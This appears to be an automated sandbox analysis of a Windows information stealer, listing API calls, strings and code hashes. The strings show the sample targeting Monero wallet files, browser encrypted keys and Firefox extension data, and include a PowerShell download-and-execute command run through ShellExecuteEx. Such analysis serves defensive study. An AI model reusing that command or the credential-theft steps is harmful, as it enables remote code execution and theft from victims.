                          • API ID: lstrcat$CloseOpenQueryValuememset
                          • String ID:
                          • API String ID: 2623679115-0
                          • Opcode ID: b2ab8835232dfbea40311d1bf88ba8abdf17708267f94c5ee16ae71de2bb2682
                          • Instruction ID: 6bbbd4e40b1e40fcd43d01a24152d63689cbc3ab5f927e80a750ca5c6fd88cbb
                          • Opcode Fuzzy Hash: b2ab8835232dfbea40311d1bf88ba8abdf17708267f94c5ee16ae71de2bb2682
                          • Instruction Fuzzy Hash: 7D4176B69002086BDF24EBE4DD46FFE737DEB98300F004558B71597181EA759B898BA2
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE99EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AE9A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00AE9A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,00AE148F,00000000), ref: 00AE9A5A
                          • LocalFree.KERNEL32(00AE148F), ref: 00AE9A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00AE9A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: b8ce861d2f925c2676eda2719e7daa675855dc8958c742f87b1a345336245c85
                          • Instruction ID: 291ee0944f280f647081d7a28ae389e650ae5dd71ca1c511836646da85f7a595
                          • Opcode Fuzzy Hash: b8ce861d2f925c2676eda2719e7daa675855dc8958c742f87b1a345336245c85
                          • Instruction Fuzzy Hash: 0C31F6B4A00309EFDB24CF95D985BAEB7B5FF58340F108168E915A7390D774AA42CFA1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Typememset
                          • String ID:
                          • API String ID: 3530896902-3916222277
                          • Opcode ID: 649832d1eddb15591cae2c17728e23d00952f2073327a39573ca8c02f14d2bec
                          • Instruction ID: 51f8910969ea2267d1e2b8b33dd75db610120b0ee645833cd89c0f721a18940b
                          • Opcode Fuzzy Hash: 649832d1eddb15591cae2c17728e23d00952f2073327a39573ca8c02f14d2bec
                          • Instruction Fuzzy Hash: B841E5B110079C5EDB218B658E84FFBBBF99F45754F1444A8FACA87182D2719A448F60
                          APIs
                          • lstrcat.KERNEL32(?,0179DAE0), ref: 00AF47DB
                            • Part of subcall function 00AF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF4801
                          • lstrcat.KERNEL32(?,?), ref: 00AF4820
                          • lstrcat.KERNEL32(?,?), ref: 00AF4834
                          • lstrcat.KERNEL32(?,0178AEA0), ref: 00AF4847
                          • lstrcat.KERNEL32(?,?), ref: 00AF485B
                          • lstrcat.KERNEL32(?,0179D420), ref: 00AF486F
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AF8D90: GetFileAttributesA.KERNEL32(00000000,?,00AE1B54,?,?,00B0564C,?,?,00B00E1F), ref: 00AF8D9F
                            • Part of subcall function 00AF4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00AF4580
                            • Part of subcall function 00AF4570: RtlAllocateHeap.NTDLL(00000000), ref: 00AF4587
                            • Part of subcall function 00AF4570: wsprintfA.USER32 ref: 00AF45A6
                            • Part of subcall function 00AF4570: FindFirstFileA.KERNEL32(?,?), ref: 00AF45BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: b7108c79f815dfeea5694ab0713a32f86796fde722923c263abca4352b6d58dc
                          • Instruction ID: 764b017722b4d84759851113f1b18f89a6d1ed62ca80945af8211f20d776f1bb
                          • Opcode Fuzzy Hash: b7108c79f815dfeea5694ab0713a32f86796fde722923c263abca4352b6d58dc
                          • Instruction Fuzzy Hash: 46315FB690031CA7CB20FBB0DD85EFD737CAB58700F404589B31996181EEB4E7898BA5
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00AF2D85
                          Strings
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00AF2D04
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00AF2CC4
                          • <, xrefs: 00AF2D39
                          • ')", xrefs: 00AF2CB3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: 179d53b01ef5beecb1f14776065fb1167830f2f4c95541c925131019be5e16df
                          • Instruction ID: 4105075256666b674124bdc2557004bc6fd2443c02a834c6f3724989a9eca7ca
                          • Opcode Fuzzy Hash: 179d53b01ef5beecb1f14776065fb1167830f2f4c95541c925131019be5e16df
                          • Instruction Fuzzy Hash: 7D41DEB1D1020C9ADB14FBE0C991BFDBB74AF20340F508169F60AA7195DFB46A4ACF91
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00AE9F41
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 9b9e0458558b8ab9579ff912e80ef71e3a8524f0b9a38382b88f2b6a61ac1e93
                          • Instruction ID: 2ab0820b7b5c75b798c9c81443aaa41e2b0124142d5034c23e9a33b3de8f4a96
                          • Opcode Fuzzy Hash: 9b9e0458558b8ab9579ff912e80ef71e3a8524f0b9a38382b88f2b6a61ac1e93
                          • Instruction Fuzzy Hash: 8A613E71A1024CEBDB24EFA5CD96FED77B5AF54340F008018FA0A9B191EB706A05CB92
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00AF696C
                          • sscanf.NTDLL ref: 00AF6999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00AF69B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00AF69C0
                          • ExitProcess.KERNEL32 ref: 00AF69DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: f2a58af8e11477251928d584124e83ca1fdeda3ed4b9b8446837fb1ea9b09107
                          • Instruction ID: 9a46adf3e5631411818fea2533f7d4c00ddcd121c24092d1ed4bdb88725a8b5c
                          • Opcode Fuzzy Hash: f2a58af8e11477251928d584124e83ca1fdeda3ed4b9b8446837fb1ea9b09107
                          • Instruction Fuzzy Hash: FB21B8B5D1420CABCB14EFE8D9459EEB7B5FF58300F04852AE506E3250EB745605CBA9
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AF7E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF7E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0178BB48,00000000,00020119,?), ref: 00AF7E5E
                          • RegQueryValueExA.ADVAPI32(?,0179D400,00000000,00000000,000000FF,000000FF), ref: 00AF7E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00AF7E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 959376e29fc2cdf10fcfe987c927061a5412eec043ffafe9c9ee1f48d7f2d0ba
                          • Instruction ID: 9e610ada25edef9c09ada3c607c72a062e5ad5112e687f4d88d3f8aa1f56d50d
                          • Opcode Fuzzy Hash: 959376e29fc2cdf10fcfe987c927061a5412eec043ffafe9c9ee1f48d7f2d0ba
                          • Instruction Fuzzy Hash: DB113AB1A44309ABD714DBD8DD4AFBFBBB8EB08B10F10415AF715E7280D77459018BA1
                          APIs
                          • StrStrA.SHLWAPI(0179D978,?,?,?,00AF140C,?,0179D978,00000000), ref: 00AF926C
                          • lstrcpyn.KERNEL32(00D2AB88,0179D978,0179D978,?,00AF140C,?,0179D978), ref: 00AF9290
                          • lstrlen.KERNEL32(?,?,00AF140C,?,0179D978), ref: 00AF92A7
                          • wsprintfA.USER32 ref: 00AF92C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 9e9a9cd1e68c2e5c645e1711b36fd253a9555324c52c38a4129fabb44aee856d
                          • Instruction ID: c48bf8e2f9089c46ef80335742a9e84e8a065b9d4d302403bd0e1d5ff575b07a
                          • Opcode Fuzzy Hash: 9e9a9cd1e68c2e5c645e1711b36fd253a9555324c52c38a4129fabb44aee856d
                          • Instruction Fuzzy Hash: CB01D675500208FFCB14DFECD988EAE7BB9EF58355F108548F9099B344C631AA41DBA6
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00AE12B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AE12BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00AE12D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00AE12F5
                          • RegCloseKey.ADVAPI32(?), ref: 00AE12FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 8db1b4e777cd2f31143d2cbc87ee565d90ebf473f1d4957819f5faf7e21b78f2
                          • Instruction ID: 9532c90744ec6a1590bf2ad9833d6c477735b8112ba226f465d04fbfbbb4987f
                          • Opcode Fuzzy Hash: 8db1b4e777cd2f31143d2cbc87ee565d90ebf473f1d4957819f5faf7e21b78f2
                          • Instruction Fuzzy Hash: A801CDB9A40308BBDB14DFE4DC49FAEB7B8EB58701F108159FA05D7280D6759A018FA1
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00AF6663
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00AF6726
                          • ExitProcess.KERNEL32 ref: 00AF6755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: 4fc91a6d411fc5601bcc3c7ea2f733b84f762ce5ab46b39a03afb50f4597bfe8
                          • Instruction ID: 485442e69b40e1101b5a92b0fe99f8a3eaa102a7f7e60d951c5229c30ee893cb
                          • Opcode Fuzzy Hash: 4fc91a6d411fc5601bcc3c7ea2f733b84f762ce5ab46b39a03afb50f4597bfe8
                          • Instruction Fuzzy Hash: 30311EF1901218ABDB14EB94DD91BEE7778AF24300F404199F309A7191DFB46B49CFAA
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B00E28,00000000,?), ref: 00AF882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF8836
                          • wsprintfA.USER32 ref: 00AF8850
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: 5ffd2ea9a7a08b99b320760a1bb1f07733821182d2626e8a3b26dd71af6643a8
                          • Instruction ID: 470674b2cd5ca42cb197e528d0e9b205987102b60abc363ceb9d557f9d403ffe
                          • Opcode Fuzzy Hash: 5ffd2ea9a7a08b99b320760a1bb1f07733821182d2626e8a3b26dd71af6643a8
                          • Instruction Fuzzy Hash: 46211AB1A40308ABDB14DF98DD49FAEBBB8FB48701F104119F605E7380C779A9018BB1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00AF951E,00000000), ref: 00AF8D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF8D62
                          • wsprintfW.USER32 ref: 00AF8D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 6db84d7176fe3bcb405f59e6e3544fc67dc2542d6aae125daf146e5906e3e1e5
                          • Instruction ID: 56b0f28a0e0127830df56161d3fd325737414d582ce3caddea1fbfc95a0de4b9
                          • Opcode Fuzzy Hash: 6db84d7176fe3bcb405f59e6e3544fc67dc2542d6aae125daf146e5906e3e1e5
                          • Instruction Fuzzy Hash: D7E08CB0A40308BBD720DB98DC0AE69BBB8EB04702F004194FE09C7390DA719E019BB6
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AF8B60: GetSystemTime.KERNEL32(00B00E1A,01799AF0,00B005AE,?,?,00AE13F9,?,0000001A,00B00E1A,00000000,?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AF8B86
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AEA2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 00AEA3FF
                          • lstrlen.KERNEL32(00000000), ref: 00AEA6BC
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 00AEA743
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 1ffc8a4138019577c2d057a9012230f38f871b7575d1c03afcb5189faabf6061
                          • Instruction ID: aa9b5091eb71fc3483dd6bd599a6de812c537d63e37d1ee516c0313c9400a840
                          • Opcode Fuzzy Hash: 1ffc8a4138019577c2d057a9012230f38f871b7575d1c03afcb5189faabf6061
                          • Instruction Fuzzy Hash: 1CE1D2B291010C9BDB15FBE4DD91DFE7338AF24340F508569F61AB6091EF706A49CBA2
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AF8B60: GetSystemTime.KERNEL32(00B00E1A,01799AF0,00B005AE,?,?,00AE13F9,?,0000001A,00B00E1A,00000000,?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AF8B86
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AED481
                          • lstrlen.KERNEL32(00000000), ref: 00AED698
                          • lstrlen.KERNEL32(00000000), ref: 00AED6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 00AED72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: b774bdb05e189a2b0633a463fe7eeeb7e318ae5ed97e3fdfb5d6c7cf3e05ebea
                          • Instruction ID: 152f224f4f27a08ba03fbe350877a69603ba36cd88aad63df9c073953dd1f797
                          • Opcode Fuzzy Hash: b774bdb05e189a2b0633a463fe7eeeb7e318ae5ed97e3fdfb5d6c7cf3e05ebea
                          • Instruction Fuzzy Hash: 889106B191010C9BCB14FBE4DE91DFE7338AF24340F508569F60BA6191EF746A09CBA2
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AF8B60: GetSystemTime.KERNEL32(00B00E1A,01799AF0,00B005AE,?,?,00AE13F9,?,0000001A,00B00E1A,00000000,?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AF8B86
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AED801
                          • lstrlen.KERNEL32(00000000), ref: 00AED99F
                          • lstrlen.KERNEL32(00000000), ref: 00AED9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 00AEDA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 19cca9df5405049a0d42cf0cd0fbf17b4f175db4dab2fb67b0743278f52bb523
                          • Instruction ID: cdf164c517c706e486fcdbce80e55c0ca08019669727bbd3e8beb5a5690c039c
                          • Opcode Fuzzy Hash: 19cca9df5405049a0d42cf0cd0fbf17b4f175db4dab2fb67b0743278f52bb523
                          • Instruction Fuzzy Hash: 6A81D3B291010C9BDB14FBE4DE95DFE7338AF24340F504569F60BA6191EF746A09CBA2
                          APIs
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE99EC
                            • Part of subcall function 00AE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AE9A11
                            • Part of subcall function 00AE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AE9A31
                            • Part of subcall function 00AE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AE148F,00000000), ref: 00AE9A5A
                            • Part of subcall function 00AE99C0: LocalFree.KERNEL32(00AE148F), ref: 00AE9A90
                            • Part of subcall function 00AE99C0: CloseHandle.KERNEL32(000000FF), ref: 00AE9A9A
                            • Part of subcall function 00AF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AF8E52
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00B01580,00B00D92), ref: 00AEF54C
                          • lstrlen.KERNEL32(00000000), ref: 00AEF56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 2f303673eba83bb58e5ee9d2a62180d548242015db4ee14d3c09cf4c64b47a53
                          • Instruction ID: 6918a9948ab20bb0d484442458fa458656568576a16192721b9cb197064a6623
                          • Opcode Fuzzy Hash: 2f303673eba83bb58e5ee9d2a62180d548242015db4ee14d3c09cf4c64b47a53
                          • Instruction Fuzzy Hash: 625123B1D1010CABDB04FBE4DD92DFD7778AF64340F408528F91AA7195EE746A09CBA2
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 035efdaa07bce1fef9be293ceabdc9978f6b46f45a8b2a7188579a31deb40018
                          • Instruction ID: bbabe5b11859a9c0bf24146f26859b71d99ad5fd84549795344b82c49a196cab
                          • Opcode Fuzzy Hash: 035efdaa07bce1fef9be293ceabdc9978f6b46f45a8b2a7188579a31deb40018
                          • Instruction Fuzzy Hash: 1E412FB2D1020DAFDF14EFE4D945AFEBBB4AB54304F008018F616A6290DB75AA05CBA1
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE99EC
                            • Part of subcall function 00AE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AE9A11
                            • Part of subcall function 00AE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AE9A31
                            • Part of subcall function 00AE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AE148F,00000000), ref: 00AE9A5A
                            • Part of subcall function 00AE99C0: LocalFree.KERNEL32(00AE148F), ref: 00AE9A90
                            • Part of subcall function 00AE99C0: CloseHandle.KERNEL32(000000FF), ref: 00AE9A9A
                            • Part of subcall function 00AF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00AF8E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00AE9D39
                            • Part of subcall function 00AE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AE4EEE,00000000,00000000), ref: 00AE9AEF
                            • Part of subcall function 00AE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00AE4EEE,00000000,?), ref: 00AE9B01
                            • Part of subcall function 00AE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AE4EEE,00000000,00000000), ref: 00AE9B2A
                            • Part of subcall function 00AE9AC0: LocalFree.KERNEL32(?,?,?,?,00AE4EEE,00000000,?), ref: 00AE9B3F
                            • Part of subcall function 00AE9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00AE9B84
                            • Part of subcall function 00AE9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00AE9BA3
                            • Part of subcall function 00AE9B60: LocalFree.KERNEL32(?), ref: 00AE9BD3
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: 756d417b3795ae0428a8ef51f8d6dc1ebf9005910a6281870d51d7eed1a793a4
                          • Instruction ID: fb4fff1df3818c9160bdbc04bc0b1efc3e13d772e194a4b65fdfbeb3ab03cf69
                          • Opcode Fuzzy Hash: 756d417b3795ae0428a8ef51f8d6dc1ebf9005910a6281870d51d7eed1a793a4
                          • Instruction Fuzzy Hash: 58314DB6D1021DABCF14EBE5DD85AEFB7B8AF48304F144558EA05A7241EB349A04CBA1
                          APIs
                          • memset.MSVCRT ref: 00AF94EB
